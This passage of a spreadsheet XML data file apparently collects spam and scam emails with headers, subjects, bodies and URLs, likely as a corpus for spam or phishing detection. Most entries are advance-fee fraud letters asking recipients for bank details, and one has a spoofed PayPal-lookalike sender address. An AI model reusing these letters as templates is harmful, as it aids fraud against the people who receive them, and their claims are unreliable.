sufficient legal warning to all who visit our website. You can view our family web page below. ([URL]www.chessonfamily.com[/URL]\n\n</t>
  </si>
  <si>
    <t>www.chessonfamily.com</t>
  </si>
  <si>
    <t>4939</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: "FTT Fulfillment Center" &lt;promos@famtriptours.com&gt;\nDate: Wed, 22 May 2002 20:51:38</t>
  </si>
  <si>
    <t>Wed, 22 May 2002 20:51:38</t>
  </si>
  <si>
    <t>"FTT Fulfillment Center" &lt;promos@famtriptours.com&gt;</t>
  </si>
  <si>
    <t>3 Locations Free:Orlando,Las Vegas,Ft Laud.</t>
  </si>
  <si>
    <t>This is an HTML email message.  If you see this, your mail client does not support HTML messages. ------=_NextPart_CMIDKJHJKO Content-Type: text/html;charset="iso-8859-1" Content-Transfer-Encoding: 7bit CONGRATULATIONS ON       RECEIVING THIS SPECIAL E-MAIL INVITATION!!!        THESE INVITATIONS WERE ONLY BEING SENT OUT... TO A VERY SELECT GROUP OF       INDIVIDUALS LIKE YOURSELF... WHO WERE CONFIRMED AND QUALIFIED TO RECEIVE THIS SPECTACULAR       OFFER!!!       PLEASE CLICK ON THE LINK BELOW TO REGISTER AND RECEIVE YOUR COMPLIMENTARY       THREE NIGHT STAY IN YOUR CHOICE OF THREE (3) OF THESE NINE (9) FUN FILLED LOCATIONS!!!       - MAGICAL ORLANDO       - LAS VEGAS... CITY OF LIGHTS       - PALM BEACH, FL.... FLORIDA'S BEST KEPT SECRET       - FABULOUS FT, LAUDERDALE       - ATLANTIC CITY... CITY OF EXCITEMENT       - NEW SMYRNA BEACH , FL.... SECLUDED FROM IT ALL       - DAYTONA BEACH , FL... THE WORLDS MOST FAMOUS BEACH       - KEY WEST, FL... THE SOUTHERN MOST POINT IN THE U.S.       - MIAMI " SOUTH BEACH". THE CITY THAT NEVER SLEEPS       SO LOG ONTO: [URL]http://www.famtriptravel.com[/URL]         ... For your Complimentary Vacations for two!!!       KEEP IN MIND... OUR OBLIGATION TO HOLD YOUR VACATIONS WILL EXPIRE 72 HOURS       FROM THE DATE OF DELIVERY OF THIS SPECIAL INVITATION               SPECIAL DISCLAIMER: This message is sent in compliance of the proposed BILL Section 301, Paragraph (a)(2)(c) of S. 1618. By providing a valid "remove me" feature it can not be considered SPAM. Furthermore, we make every effort to insure that the recipients of our direct marketing are those individuals who have asked to receive additional informaion on promotional offers from companies who offer Internet Marketing Products. Again we apologize if this message has reached you in error. Screening of addresses has been done to the best of our technical ability. We honor all removal requests. If you would like, you can be removed from any future mailings by the sponsor listed above by e-mailing mailto:removeme@famtriptravel.com  with the subject "remove me" in the subject line. This advertising material is being used for the purpose of soliciting sales of a vacation interval ownership plan. ------=_NextPart_CMIDKJHJKO--</t>
  </si>
  <si>
    <t>http://www.famtriptravel.com</t>
  </si>
  <si>
    <t>4940</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "Producers Financial Network" &lt;pfn@insurancemail.net&gt;\nDate: Wed, 22 May 2002 19:29:30 -0400</t>
  </si>
  <si>
    <t>Wed, 22 May 2002 19:29:30 -0400</t>
  </si>
  <si>
    <t>"Producers Financial Network" &lt;pfn@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Almost-Guaranteed Issue Term</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_223205_01C201AE.0A589530 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  "Turbojet Issue" Impaired Risk Term=09  	 Only 8 Medical Questions=0A= Accept/Reject Underwriting=09 Almost Guarantee Issue Term for Impaired Risk Market 10 Year Level Term - 8 Medical Questions Issue Ages 20 to 55 - $10,000 to $75,000 Face Amount A+ Carrier You Won't Sleep Tonight Thinking About All The Prospects=20 You Have For This Product! You Have Several Cases In Your Desk Drawer=20 For This Product! Call or e-mail   us today! Visit our web site [URL]www.impairedriskterm.com[/URL]   for rates=20 and a sample application =09  800-562-8019=09 Please fill out the form below for more information	=20 Name:	  =09 E-mail:	  =09 Phone:	  =09 City:	  	State:	  	 =09  	  	 	   =09 =20 We don't want anybody to receive our mailing who does not wish to receive them. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal Notice =20 ------=_NextPart_000_223205_01C201AE.0A589530 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Almost-Guaranteed Issue Term =20          =20              =20              =20             =20                                Almost Guarantee Issue Term for Impaired Risk Market                 10 Year Level Term - 8 Medical Questions                 Issue Ages 20 to 55 - $10,000 to $75,000 Face Amount                 A+ Carrier =20             =20                                You Won't Sleep Tonight Thinking About All The Prospects =                 You Have For This Product!                 You Have Several Cases In Your Desk Drawer                  For This Product! =20                             Call  or e-mail us today!                Visit our web site [URL]www.impairedriskterm.com[/URL] = for rates                 and a sample application =20              =20             =20                =20                    =20                        =20                           Please fill out the form below for more = information =20                           Name: =20                              =20                           E-mail: =20                              =20                           Phone: =20                              =20                           City: =20                              State: =20                              =20                             =20                                =20                              =20             =20                                We don't want anybody to receive our mailing who does = not wish to=20                 receive them. This is professional communication sent to = insurance=20                 professionals. To be removed from this mailing list, DO = NOT REPLY=20                 to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal = Notice ------=_NextPart_000_223205_01C201AE.0A589530--</t>
  </si>
  <si>
    <t>www.impairedriskterm.com http://www.insurancemail.net www.impairedriskterm.com http://www.insurancemail.net</t>
  </si>
  <si>
    <t>529</t>
  </si>
  <si>
    <t>To: "=?utf-8?Q?jose=40monkey=2Eorg?=" &lt;jose@monkey.org&gt;\nFrom: "=?utf-8?Q?service=40intI=2EpaypaI=2Eco?=" &lt;cc.mail-service@intI.paypaI.co-notif.aktivity.preview.mail.live.bussines&gt; \nDate: Wed, 22 Mar 2017 15:02:42 +0000</t>
  </si>
  <si>
    <t>Wed, 22 Mar 2017 15:02:42 +0000</t>
  </si>
  <si>
    <t xml:space="preserve">"=?utf-8?Q?service=40intI=2EpaypaI=2Eco?=" &lt;cc.mail-service@intI.paypaI.co-notif.aktivity.preview.mail.live.bussines&gt; </t>
  </si>
  <si>
    <t>"=?utf-8?Q?jose=40monkey=2Eorg?=" &lt;jose@monkey.org&gt;</t>
  </si>
  <si>
    <t>http://www.mightyape.co.nz</t>
  </si>
  <si>
    <t>1935</t>
  </si>
  <si>
    <t>To: R@M\nFrom: OLSOM BERGHART &lt;olsonbeghart1@laposte.net&gt;\nDate: Wed, 22 Mar 2006 20:32:24 +0000</t>
  </si>
  <si>
    <t>Wed, 22 Mar 2006 20:32:24 +0000</t>
  </si>
  <si>
    <t>OLSOM BERGHART &lt;olsonbeghart1@laposte.net&gt;</t>
  </si>
  <si>
    <t>GOOD DAY..</t>
  </si>
  <si>
    <t>Dear Friend, I am Mr Olsom Berghart a personal treasurer to Mikhail Khodorkovsky the richest man in Russia and owner of the  following companies: Chairman CEO:YUKOS OIL (Russian Most Largest Oil Company)Chairman CEO:Menatep SBP Bank (A well  reputable  financial institution with its branches all over the world) SOURCE OF FUNDS:I have a profiling amount in an excess of US$100,500,000.00 which I seek your partnership in accommodating for me. You will be rewarded with 10% of the total sum for your partnership. Can  you be my partner on this?   INTRODUCTION OF MY SELFAs a personal consultant to him, authority was handed over to me in transferring money of an American oil merchant for  his last oil deal with my boss Mikhail Khodorkovsky. Already the funds have left the shore of Russia to a European private  ank where the final crediting is expected to be carried out. While I was on the process, My Boss got arrested for his  involvement in politics by financing the leading and opposing political parties (the Union of Right Forces,led by Boris  Nemtsov,and Yabloko,a liberal/social democratic party led by Gregor Yavlinsky) which poses threat to President Vladimir  Putin second tenure as Russian president.You can catch more of the story on the following website: [URL]http://www.yukos[/URL] /51215.html YOUR ROLE:All I need from you is to stand as the beneficiary of the above quoted sum and I will re-profile the funds with your name,  which will enable the European bank transfer the sum to you through a reputable security company in Europe,Canada or  Mexico depending on your choice . I have decided to use this sum to relocate to your country and never to be connected  to any of Mikhail Khodorkovsky conglomerates. The transaction has to be concluded before my boss is out from jail. As  soon as I confirm your Readiness to conclude the transaction with me, I will provide you with the details. Thank you very much RegardsOlsom Berghart(Mr)</t>
  </si>
  <si>
    <t>http://www.yukos</t>
  </si>
  <si>
    <t>1931</t>
  </si>
  <si>
    <t>To: nan\nFrom: Dr Hassan Dantata &lt;dr_hassan140@hotmail.com&gt;\nDate: Wed, 22 Mar 2006 07:49:22 +0000</t>
  </si>
  <si>
    <t>Wed, 22 Mar 2006 07:49:22 +0000</t>
  </si>
  <si>
    <t>Dr Hassan Dantata &lt;dr_hassan140@hotmail.com&gt;</t>
  </si>
  <si>
    <t>REPLY URGENT AND CALL ME.</t>
  </si>
  <si>
    <t>FROM THE DESK OF : DR HASSAN DANTATA,\nAUDITING AND ACCOUNTING SECTION,\nAFRICAN DEVLOPMENT BANK ( A.D.B )\nOUAGADOUGOU BURKINA-FASO,WEST AFRICA.\n\n\nAttention Please,\n\n\nI am Dr Hassan Dantata, the Director in charge of Auditing and Accounting \nsection of AFRICAN DEVELOPMENT BANK (A.D.B) Ouagadougou Burkina-faso West \nAfrica. With due respect and regard. I have decided to contact you on a \nbusiness transaction that will be very beneficial to both of us at the end \nof the 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7.5M (Seven Million,Five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30% of the \ntotal sum as gratification, while 10% will be set aside to take care of \nexpenses that may arise during the time of transfer and also telephone and \ninternet bills, while 60% will be for me and my coleagues. Please, you have \nbeen adviced to keep "Top Secret" as I am still in service and intend to \nretire from service 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Dr Hassan Dantata\n\nMOBILE: ( 00226 78 82 97 88 )\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://messenger.msn.click-url.com</t>
  </si>
  <si>
    <t>1930</t>
  </si>
  <si>
    <t>To: nan\nFrom: MM Group Handling &lt;mm.group@laposte.net&gt;\nDate: Wed, 22 Mar 2006 02:39:54 +0100</t>
  </si>
  <si>
    <t>Wed, 22 Mar 2006 02:39:54 +0100</t>
  </si>
  <si>
    <t>MM Group Handling &lt;mm.group@laposte.net&gt;</t>
  </si>
  <si>
    <t>*** BE INFORMED ***</t>
  </si>
  <si>
    <t>\nMM Group Handling\nUnit 15\nCarlyon Road Industrial Estate\nAtherstone \nWarwickshire CV9 1LQ\nUnited kingdom\nTel: +44-703-190-7869\n\nDear Representative,\nRef:234/U, \n\nI am Mr. Richard.H.Manson Managing Director MM Group Handling.\nWe are a trading company that is into the hire,sales and service of electrical trucks,fork truks and associated \n\nmaterials handling equipments and diverse range of battery electric vehicles which can be readily adapted\nfor customers specific requirements to the USA,Canada and selected locations in Europe.\n\nWe are searching for individuals or a company who can act as our representative/payment agent in your country \n\nand earn 10% of every payment made through you to us.\n\nFor further details, do endeavour to forward the following below to us OR call +44-703-190-7869\n\n1. Full Names:\n2. Company Name: (If any)\n3. Full Contact Address: (Home address only, P O Box not applicable)\n4. Tel and Fax Numbers: \n\nRegards, \nRichard.H.Manson \nManaging Director\n\nCopyright &amp;copy; 2004 MM Group Handing! All rights reserved\n\n___________________________________________________________________________\nPL:: E-mail wysany za pomoc usugi WebMail oferowanej przez [URL]http://www.Problemy.PL[/URL]\nEN:: Mail sent from WebMail service at [URL]http://www.Problemy.PL[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.Problemy.PL http://www.Problemy.PL</t>
  </si>
  <si>
    <t>POL</t>
  </si>
  <si>
    <t>1367</t>
  </si>
  <si>
    <t>To: petermoyo1000@hotmail.com\nFrom: peter moyo &lt;petermoyo1000@hotmail.com&gt;\nDate: Wed, 22 Jun 2005 10:05:32 +0200</t>
  </si>
  <si>
    <t>Wed, 22 Jun 2005 10:05:32 +0200</t>
  </si>
  <si>
    <t>peter moyo &lt;petermoyo1000@hotmail.com&gt;</t>
  </si>
  <si>
    <t>petermoyo1000@hotmail.com</t>
  </si>
  <si>
    <t>PLEASE HELP MY FAMILY.</t>
  </si>
  <si>
    <t>NO.10 ANDERSON STREET,\nMANDELA CRESENT\nJOHANNESBURG 2001.\nTEL 27-73-307-2272\n\nDear Sir/Madam\n\nMy name is MR PETER MOYO, the eldeset son of Mr.MORGAN MOYO of Zimbabwe. \nThis might come to you as a surprise about where I got your contact address. \nI got your address from the South African Chamber of Commerce in \nJohannesburg, South Africa.\n\nDuring the current war against the farmers in Zimbabwe from the supporters \nof our President Robert Mugabe to claim all the white-owned farms to his \nparty members and his followers, he ordered all white farmers to surrender \nall their farms to his party members and his followers.\nMyfather was one of the best farmers in our country and because he did not \nsupport Mugabe's ideas, Mugabe's supporters invaded my father's farm and \nburnt everything in the farm, killing my father and made away with a lot of \nitems in my father's farm.\n\nBefore his death, my father had deposited with one of the Security Company \nin Johannesburg, South Africa the sum of US$26 Million United States \nDollars).with my name and made every documents with my name both the \ncertificate of depository. Then after the death of my father, we decided to \nmove to the Republic of South Africa\nwhere he had deposited the money in the Security Company as family \nvaluables.\n\nSo, I decided to contact you to assist me to transfer this money out of \nSouth Africa because as asylum seekers we are not allowed to operate any \nbank account within South Africa. We have agreed to offer you 20% of the \ntotal sum for your assistance, 5% will be mapped out for any expenses that \nmay be incurred in the course of this transaction and 75% will be for me and \nmy family to invest in your country.\n\nAll I want you to do is to furnish me with your full personal phone and fax \nnumbers for easy communication. You can contact me on the above Telephone \nnumber. Note that this transaction is 100% risk free and absolutely \nconfidential.\n\nThanks and God bless as I await your reply.\nBest Regards,\nPETER MOYO\n(For Family).\n\n_________________________________________________________________\nWe've added lots of new goodies to MSN South Africa - visit us today! \n[URL]http://www.msn.co.za[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.msn.co.za</t>
  </si>
  <si>
    <t>1828</t>
  </si>
  <si>
    <t>To: nan\nFrom: mohamat ali &lt;mohamat02@hotmail.com&gt;\nDate: Wed, 22 Feb 2006 04:42:10 +0000</t>
  </si>
  <si>
    <t>Wed, 22 Feb 2006 04:42:10 +0000</t>
  </si>
  <si>
    <t>mohamat ali &lt;mohamat02@hotmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF : MR MOHAMAT ALI,\nAUDITING AND ACCOUNTING SECTION,\nAFRICAN DEVLOPMENT BANK ( A.D.B )\nOUAGADOUGOU BURKINA-FASO,WEST AFRICA.\n\n\nAttention Please,\n\n\nI am Mr Mohamat Ali, the Director in charge of Auditing and Accounting \nsection of AFRICAN DEVELOPMENT BANK (A.D.B) Ouagadougou Burkina-faso West \nAfrica. With due respect and regard. I have decided to contact you on a \nbusiness transaction that will be very beneficial to both of us at the end \nof the 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7.5M (Seven Million,Five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30% of the \ntotal sum as gratification, while 10% will be set aside to take care of \nexpenses that may arise during the time of transfer and also telephone and \ninternet bills, while 60% will be for me and my coleagues. Please, you have \nbeen adviced to keep "Top Secret" as I am still in service and intend to \nretire from service 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Mr Mohamat Ali.\n\nMOBILE: ( 00226 78 82 97 88 )\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1825</t>
  </si>
  <si>
    <t>To: nan\nFrom: sanou bello &lt;sanou_bello250@hotmail.com&gt;\nDate: Wed, 22 Feb 2006 00:01:14 +0000</t>
  </si>
  <si>
    <t>Wed, 22 Feb 2006 00:01:14 +0000</t>
  </si>
  <si>
    <t>sanou bello &lt;sanou_bello250@hotmail.com&gt;</t>
  </si>
  <si>
    <t>VERY VERY URGENT</t>
  </si>
  <si>
    <t>DR.SANOU BELLO\nDear,\n\nI am the head of Accounts and Audit Department of Bank of Africa,\nOuagadougou . I decided to contact you after a careful thought that you may \nbe capable of handling this business transaction which i explained below;\n\nIn my department we discovered an abandoned sum of $10.5m US dollars (Ten \nmillion, five hundred thousand US dollars). In an account that belongs to \none of our foreign customer who died along with his entire family in 2000  \nin a plane crash.\n\nSince we got information about his death, we have been expecting his next of \nkin to come over and claim his money because we cannot release it unless \nsomebody applies for it as next of kin or relation to the deceased as \nindicated in our banking guidelines but unfortunately we learnt that his \nsupposed next of kin(his son and wife) died alongside with him at the plane \ncrash leaving nobody behind for the claim .\n\nIt is therefore upon this discovery that I and other officials in my \ndepartment now decided to make this business proposal to you and release the \nmoney to you as the next of kin (We want to present you as his busines \nasociate )to the deceased for safety and subsequent disbursement since \nnobody is coming for it and we don't want this money to go into the Bank \ntreasury as unclaimed Bill.\n\nThe Banking law and guideline here stipulates that if such money remained \nUnclaimed after seven years, the money will be transferred into the Bank \ntreasury as unclaimed fund. The request of foreigner as next of kin in this \nbusiness is occasioned by the fact that the customer was a foreigner and a \nBurkinabe cannot stand as next of kin to a foreigner .\n\nWe agree that 30% of this money will be for you as foreign partner, in \nrespect to the provision of a foreign account, 10 % will be set aside for \nexpenses incurred during the business and 60% would be for me and my \ncolleagues. There after I and my colleagues will visit your country for \ndisbursement according to the percentages indicated.\n\nTherefore to enable the immediate transfer of this fund to your account as \narranged,you must apply first to the bank as next of kin of the deceased \ncustomer. Upon receipt of your reply, I will send to you by fax or email the \ntext of the application. I will not fail to bring to your notice that this \ntransaction is hitch free and that you should not entertain any atom of fear \nas all required arrangements have been made for the transfer.\n\nI expect that you contact me immediately as soon as you receive this letter.\n\nHoping to hear from you immediately.\n\nYours faithfully,\nDR .SANOU BELLO\nAccounts &amp; Audit Department ,\nBank of Africa\n\nNb.also give me your telephone and fax numbers for easy comunication with \nyou.\n\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE! \n[URL]http://messenger.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>3289</t>
  </si>
  <si>
    <t>To: nan\nFrom: isedore lawan &lt;mr_isedore_lawan0053@hotmail.fr&gt;\nDate: Wed, 22 Aug 2007 07:13:56 +0000</t>
  </si>
  <si>
    <t>Wed, 22 Aug 2007 07:13:56 +0000</t>
  </si>
  <si>
    <t>isedore lawan &lt;mr_isedore_lawan0053@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>REQUEST FOR YOUR URGENT ASSISTANCE</t>
  </si>
  <si>
    <t>\nMR ISEDORE LAWANBANK OF AFRICA.(BOA)OUAGADOUGOU -BURKINA FASO.\n \n      REQUEST FOR YOUR URGENT ASSISTANCE\n \nReply me here please.                             Email: isedore.lawan@gmail.com\n \nDear Friend,This message might meet you in utmost surprise, however,it's just my urgent need for foreign partner that made me to contact you for this transaction. I am a banker by profession from Burkina faso in west Africa and currently holding the post of Director Auditing and Accounting unit of the bank.I have the opportunity of transfering the left over funds ($11.5million) of one of my bank clients who died along with his entire family on 31 july 2000 in a plane crash.You can confirm the genuiness of the deceased death by clicking on this web site [URL]http://news.bbc.co.uk[/URL]\n \nHence,i am inviting you for a business deal where this money can be shared between us in the ratio of 60/30 while 10% will be mapped out for expenses.If you agree to my business proposal.further details of the transfer will be forwarded to you as soon as i receive your return mail. have a great day.yours,Mr Isedore Lawan\n \nSend your Reply to my new email address.Email: isedore.lawan@gmail.com\n_________________________________________________________________\nDécouvrez Windows Live Spaces et créez votre site Web perso en quelques clics !\n[URL]http://spaces.live.com[/URL]</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://spaces.live.com</t>
  </si>
  <si>
    <t>2244</t>
  </si>
  <si>
    <t>To: jamessakato2@latinmail.com &lt;jamessakato2@latinmail.com&gt;\nFrom: james sakato &lt;jamessakato2@latinmail.com&gt;\nDate: Wed, 21 Jun 2006 21:54:43 +0200</t>
  </si>
  <si>
    <t>Wed, 21 Jun 2006 21:54:43 +0200</t>
  </si>
  <si>
    <t>james sakato &lt;jamessakato2@latinmail.com&gt;</t>
  </si>
  <si>
    <t>jamessakato2@latinmail.com &lt;jamessakato2@latinmail.com&gt;</t>
  </si>
  <si>
    <t>TREAT  AS  URGENT AND CONFIDENTIAL REPLY IMMEDIATELY</t>
  </si>
  <si>
    <t>FROM THE DESK OF JAMES SAKATO\n AFRICAN DEVELOPMENT BANK (ADB)\nOUAGADOUGOU BURKINA-FASO WEST AFRICA.\nPLANE CRASH WEB SITE...[URL]http://news.bbc.co.uk[/URL] \n\n("REMITTANCE OF $10.5 MILLION U.S.A DOLLARS\nCONFIDENTIAL IS THE CASE")\n\nFIRST, I MUST SOLICIT YOUR CONFIDENCE IN THIS TRANSACTION.THIS IS BY \nVIRTUE OF ITS NATURE AS BEING UTTERLY CONFIDENTIAL AND TOP SECRET. \nHOWEVER AFTER SERIES OF PETITION WAS RECIEVED BY THIS PRESENT REGIME FROM FOREIGN CONTRACTORS AND INABILITY OF THE ARICAN DEVOLOPMENT BANK (ADB)TO FULFILL THEIR OBLIGATION FOR THE PAYMENT TO ITS FOREIGN CREDITORS, IN CONJUNCTION WITH THE COUNCIL OF MINISTERS, THEY MANDATED US TO CARRY OUT A CAREFUL AND COMPREHENSIVE REVIEW OF ALL OVERDUE PAYMENTS TO FOREIGN CONTRACTORS  AND TO EFFECT PAYMENTS IMMEDIATELY.\n\nDURING THE ABOVE MENTIONED PROCESS, WE DISCOVERED AN ABANDONED SUM OF US$10.5 M (TEN MILLION FIVE HUNDRED THOUSAND US DOLLARS) IN AN ACCOUNT THAT BELONGS TO ONE OF OUR FOREIGN CUSTOMER WHO DIED ALONG WITH HIS ENTIRE FAMILY IN A PLANE CRASH THAT HAPPENED IN  JULY 2000.SINCE WE GOT INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT OF KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT RELEASE IT UNLESS SOME BODY APPLIES FOR IT AS NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN OUR BANKING GUIDELINES AND LAWS BUT UNFORTUNATELY WE LEARNT THAT ALL HIS SUPPOSED NEXT OF KIN OR RELATION DIED ALONGSIDE WITH HIM AT THE PLANE CRASH LEAVING NOBODY BEHIND FOR THE CLAIM.\n\nIT IS THEREFORE UPON THIS DISCOVERY THAT I AND OTHER OFFICIALS IN MY \nDEPARTMENT NOW DECIDED TO MAKE THIS BUSINESS PROPOSAL TO YOU AND RELEASE THE MONEY TO YOU AS THE NEXT OF KIN OR RELATION TO THE DECEASED FOR SAFETY AND SUBSEQUENT DISBURSEMENT SINCE NOBODY IS COMING FOR IT AND WE DON'T WANT THIS MONEY TO GO INTO THE BANK TREASURY AS UNCLAIMED BILL.\n\nI AGREE THAT 40% OF THIS MONEY WILL BE FOR YOU AS A FOREIGN PARTNER, IN RESPECT TO THE PROVISION OF A FOREIGN ACCOUNT,AND 50% WOULD BE FOR ME, WHILE 10% WILL BE FOR EXPENSES INCURE DURING THE TRANSACTION. THERE AFTER I WILL VISIT YOUR COUNTRY FOR DISBURSEMENT ACCORDING TO THE PERCENTAGE INDICATED.THEREFORE, TO ENABLE THE IMMEDIATE TRANSFER OF THIS FUND TO YOU AS ARRANGED, YOU MUST APPLY FIRST TO THE BANK AS RELATION OR NEXT OF KIN OF THE DECEASED INDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR PRIVATE TELEPHONE AND FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION WHEREIN THE MONEY WILL BE REMITTED.\n\nUPON THE RECEIPT OF YOUR REPLY, I WILL SEND TO YOU BY EMAIL THE TEXT OF THE APPLICATION TO FILL AND SEND TO THE BANK. I WILL NOT FAIL TO BRING TO YOUR NOTICE THAT THIS TRANSACTION IS HITCH-FREE RISK AND THIS TRANSACTION WILL ONLY TAKE US 14 BANKING DAYS BECAUSE AS A BANKER, I KNOW WHAT TO DO AND MOVE THE FUND INTO YOUR ACCOUNT WITHOUT ANY DELAY AND THATYOU SHOULD NOT ENTERTAIN ANY ATOM OF FEAR AS ALL REQUIRED ARRANGEMENT HAVE BEEN MADE FOR THE TRANSFER.\n\nYOU SHOULD CONTACT ME ON RECEIPT OF THIS LETTER SO THAT I WILL SEND YOU THE TEXT OF THE APPLICATION TO APPLY TO THE BANK AND THE DATA INFORMATION OF THE DECEASED .\n\nYOUR'S FAITHFULLY,\n\nJAMES SAKATO \nFROM (ADB) OUAGADOUGOU BURKINA-FASO.\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://www.latinchat.com</t>
  </si>
  <si>
    <t>2243</t>
  </si>
  <si>
    <t>To: john_jacob@latinmail.com &lt;john_jacob@latinmail.com&gt;\nFrom: john jacob &lt;john_jacob@latinmail.com&gt;\nDate: Wed, 21 Jun 2006 19:15:06 +0200</t>
  </si>
  <si>
    <t>Wed, 21 Jun 2006 19:15:06 +0200</t>
  </si>
  <si>
    <t>john jacob &lt;john_jacob@latinmail.com&gt;</t>
  </si>
  <si>
    <t>john_jacob@latinmail.com &lt;john_jacob@latinmail.com&gt;</t>
  </si>
  <si>
    <t>FROM MR,JOHN JACOB</t>
  </si>
  <si>
    <t>FROM MR,JOHN JACOB\nBILL AND EXCHANGE MANAGER\nBANK OF AFRICA(BOA)\nOUAGADOUGOU BURKINA FASO.\n\nDEAR FRIEND,\n\nI AM THE MANAGER OF BILL AND EXCHANGE AT THE FOREIGN REMITTANCE DEPARTMENT OF BANK OF AFRICA(B.O.A) HERE IN OUAGADOUGOU,BURKINA FASO. IN MY DEPARTMENT WE DISCOVERD AN ABANDONED SUM OF$30 MILLION UNITED STATE DOLLARS(THIRTY MILLION US DOLLARS IN AN ACCOUNT THAT BELONGE TO ONE OF OUR FORIEGN CUSTOMER(MR ANDREAS SCHRANNER FROM MUICH,GERMANY) WHO DIED ALONG WITH HIS ENTIRE FAMILY IN JULY 2000 IN A PLANE CRASH.([URL]http://news.bbc.co.uk[/URL]\n\nSINCE WE GOT THE INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT OF KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT RELEASE IT,UNLESS SOMEBODY APPPLIES FOR THE NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN OUR BANKING GUIDLING AND LAW BUT UNFORTUNATELY WE LEARNT THAT HIS NEXT OF KIN DIED ALONG WITH HIM IN THE PLANE CRASH.\n\nTHE BANKER GUIDLINE HERE A RESPONSABLE PERSON, AND WHO THE BANK CAN INTROSSTED THIS TREASURY AS UNCLAIMED FUND.THE RESQUEST OF FORIEGNER AS NEXT OF KIN IN HIS BUSINESS IS OCCASSIONED BY THE FACT THAT THE CUSTOMER WAS A FOREIGNER AND A BURKINABLE CANNOT STAND AS NEXT OF KIN TO A FOREIGNER.\n\nI AGREE THAT 30% OF THIS MONEY WILL BE FOR YOU AS A RESPECT TO THE PROVISION OF A FOREIGN ACCOUNT,10% WILL BE SET ASIDE FOR ANY EXPENSES INCURRED DURING THE BUSINESS AND 60% WOULD BE FOR ME, THEREAFTER, I WILL VISIT YOUR COUNTRY FOR  DISBURSEMENT ACCORDING TO THE PERCENTAGE INDICATED THEREFORE, TO ENABLE THE IMMEDIATE TRANSFER OF THIS FUND TO YOU AS ARRANGED, YOU MUST APPLY FIRST TO THE BANK AS RELATION OR NEXT OF KIN OF THE DECEASED INDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR PRIVATE TELEPHONE NUMBER AND YOUR FAX NUMBER FOR EASY  AND EFFECTIVE COMMUNICATION  AND LOCATION WHERE IN THE MONEY WILL BE REMITTED.\n\nUPON RECEPIT OF YOUR REPLY, I WILL SEND TO YOU BY FAX OR EMAIL THE TEXT OF APPLICATION.I WILL NOT FAIL TO BRING TO YOUR NOTICE THIS TRANSACTION IS HITCH-FREE AND THAT YOU SHOULD NOT ENTERTAIN ANY ATOM OF FEAR AS ALL REQUIRD ARRANGEMENTS HAVE BEEN MADE FOR THE TRANSFER. YOU SHOULD CONTACT ME IMMEDIATELY AS SOON AS YOU RECEIVE THIS LETTER.\nTRUSTING TO HEAR FROM YOU IMMEDIATELY.\n\nYOUR's FAITHFULLY,\nMR,JOHN JACOB\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>2240</t>
  </si>
  <si>
    <t>To: nan\nFrom: ysouf arouna0004 &lt;ysouf_arouna0004@hotmail.com&gt;\nDate: Wed, 21 Jun 2006 07:32:48 +0000</t>
  </si>
  <si>
    <t>Wed, 21 Jun 2006 07:32:48 +0000</t>
  </si>
  <si>
    <t>ysouf arouna0004 &lt;ysouf_arouna0004@hotmail.com&gt;</t>
  </si>
  <si>
    <t>PRIVATE AND URGENT</t>
  </si>
  <si>
    <t>ATTN: HELPER.\n\n(STRICTLY CONFIDENTIAL)\nFROM THE DESK OF ( MR.YSOUF AROUNA)\nAUDITING AND ACCOUNTING UNIT /FOREIGN REMITTANCE DEPT.\nAFRICAN DEVELOPMENT BANK (A.D.B)OUAGADOUGOU -BF\nREQUEST FOR THE URGENT TRANSFER OF THE SUM (US$10.5million) ONLY INTO YOUR \nACCOUNT.\n\nYou may be surprise to receive this message from me since you don't know me \nin person, but for the purpose of introduction., I got your impressive \ninformation through an international business equiry .\n\nBut I respectfully insist you read crefully as I am optimistic it will open \ndoors for unimaginable financial reward for both us.\nThis business transaction might not fall within the wide spectrum of your \nbusiness activities ,but I plead your assistance ,as your flair for \nprofitable business is needed .\n\nPermit me to introduce myself. I am MR. YSOUF AROUNA. the Manager of \nauditing and accounting unit at the foreign remittance department of AFRICAN \nDEVELOPMENT BANK . In My department I discovered an abandoned sum of$ 10.5m \nUS dollars . In an account that belongs to one of our foreign customer who \ndied along with his entire family in november 2002 in a plane crash.\n\nSince I got information about his death, I have been expecting his next of \nkin to come over and claim his money because wecannot release it unless \nsomebody applies for it as next of kin or 